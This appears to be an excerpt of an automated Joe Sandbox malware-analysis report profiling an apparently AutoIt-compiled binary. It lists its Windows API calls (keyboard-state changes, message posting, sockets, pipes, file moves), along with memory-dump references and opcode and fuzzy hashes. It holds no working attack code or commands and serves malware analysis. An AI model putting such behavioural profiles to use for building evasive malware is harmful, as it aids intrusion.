• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F4194E
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F419D1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F41B7B,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41A64
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F41AF7
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F41B22
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F41B2E
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F71C1B
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71C43
                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F71C67
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71C97
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71D1E
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71D83
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71DEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a4b014c05f40fe929c29c75e70f541f4cf5599e57c3e2c22fcf90b8d2a3ad2e0
                                                                                                                                                                                                                                                                                        • Instruction ID: b0b8f24ebc0b9286078d49bd764699dc75dd31138fd10ec62f6c308d47a7fa55
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b014c05f40fe929c29c75e70f541f4cf5599e57c3e2c22fcf90b8d2a3ad2e0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B591F576A002199FDB01DF9CC884BFEB7B5FF04721F10801AE944E7291D778A949EB52
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F843C8
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F844D7
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F844E7
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F8467C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantInit.OLEAUT32(00000000), ref: 00F716DE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantCopy.OLEAUT32(?,?), ref: 00F716E7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7169E: VariantClear.OLEAUT32(?), ref: 00F716F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ea18fe3bceb97909831c73a1f68c11181f35d19aacb0877d1aa016288d49586
                                                                                                                                                                                                                                                                                        • Instruction ID: 43c5db4f4d042d96aebcbfaf1c037de3753976d73768f70eebc5417543cdef43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea18fe3bceb97909831c73a1f68c11181f35d19aacb0877d1aa016288d49586
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A914A75A043029FC704EF24C8819AAB7E5FF89714F14892DF8899B351DB35ED46EB82
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?,?,00F60C4E), ref: 00F6091B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60936
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60944
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F608FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?), ref: 00F60954
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F856AE
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F857B6
                                                                                                                                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F8582C
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00F85837
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                        • Opcode ID: d872c7acf3e2d9dbc9bb11709cdf01d124080eb6a92da98b5a32df6097bbc962
                                                                                                                                                                                                                                                                                        • Instruction ID: 8333d9410c0a5ad502273364406a9b32ec34bceeffae99af3cabb1414a111c8c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d872c7acf3e2d9dbc9bb11709cdf01d124080eb6a92da98b5a32df6097bbc962
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91910771D0021DEBDF10EFA4DC81AEEB7B8BF08714F10456AE915A7291DB749A44EF60
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 00F92C1F
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F92C51
                                                                                                                                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F92C79
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F92CAF
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F92CE9
                                                                                                                                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00F92CF7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F92D7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3bdce1525412c485fc7fc6be3573abd7a872f0bb8d0f799852d16c3e42b7925d
                                                                                                                                                                                                                                                                                        • Instruction ID: 377c8b16d98eab6241827801199560bc25f27aca837154052499f63266fe9585
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bdce1525412c485fc7fc6be3573abd7a872f0bb8d0f799852d16c3e42b7925d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49718D76E00215AFDF50EF64D885AAEB7F1EF48320F148459E816EB351DB34AE41AB90
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00F98992
                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00F9899E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F98A79
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00F98AAC
                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 00F98AE4
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00F98B06
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F98B1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ac8bca3aea29f1c19ef511304145a20f28a496fa21256694b28ed736d5669ed
                                                                                                                                                                                                                                                                                        • Instruction ID: 2ff6b3f29e9f15009cb3abe962a2fb3b0a21dee528f14e1e8df0af4a6af9e622
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ac8bca3aea29f1c19ef511304145a20f28a496fa21256694b28ed736d5669ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F718F74A00208AFFF259F64C884FBA7BB5FF5A3A0F14045AE84567261CB35AD42FB51
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F6B8C0
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6B8D5
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6B936
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F6B964
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6B983
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F6B9C4
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F6B9E7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3f3da700ff2adb23d217a9f1c177c077ee1d21008dcd001f1b9b86b83a83c651
                                                                                                                                                                                                                                                                                        • Instruction ID: 063089d6324fd81c2200b3100ddfefdcf4850ee25df555eaf65f8f2e1d6c13ed
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f3da700ff2adb23d217a9f1c177c077ee1d21008dcd001f1b9b86b83a83c651
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A051EFA0A487D53EFB364334CC45BBABEA95F46714F088489E2D5868D2D3E8ACC4F750
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32(00000000), ref: 00F6B6E0
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6B6F5
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6B756
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F6B782
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F6B79F
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F6B7DE
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F6B7FF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a864c69423b030013f7734edba5d9fb356814ffd32e2d69e9e5353eaffdf772
                                                                                                                                                                                                                                                                                        • Instruction ID: 98712a44a525097789c432958ab6c87a891270c2572fb3b83fc03ca588f32b85
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a864c69423b030013f7734edba5d9fb356814ffd32e2d69e9e5353eaffdf772
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E51DFA0D486D53EFB328334CC55B7ABEA95B46314F0C8599E0D98A8D2D394ECC9FB50
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F35F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F357E3
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00F3585E
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00F35879
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F3589F
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00F35F16,00000000,?,?,?,?,?,?,?,?,?,00F35F16,?), ref: 00F358BE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00F35F16,00000000,?,?,?,?,?,?,?,?,?,00F35F16,?), ref: 00F358F7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F230BB
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00F230C3
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F23151
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F2317C
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F231D1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: _wcslen.LIBCMT ref: 00F83AF8
                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F81B6F
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F81B7E
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F81C26
                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00F81C56
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6D7CD,?), ref: 00F6E714
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6D7CD,?), ref: 00F6E72D
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F6D7F0
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F6D82A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6D8B0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6D8C6
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00F6D90C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F938B8
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F938EB
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F93920
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F93952
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F9397C
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F9398D
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F939A7
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F680D0
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F680F6
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F680F9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68117
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F68120
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F68145
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68153
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F681A9
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F681CF
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F681D2
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 00F681F3
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00F681FC
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F68216
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68224
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00F70E99
                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70ED5
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00F70F6D
                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70FA8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
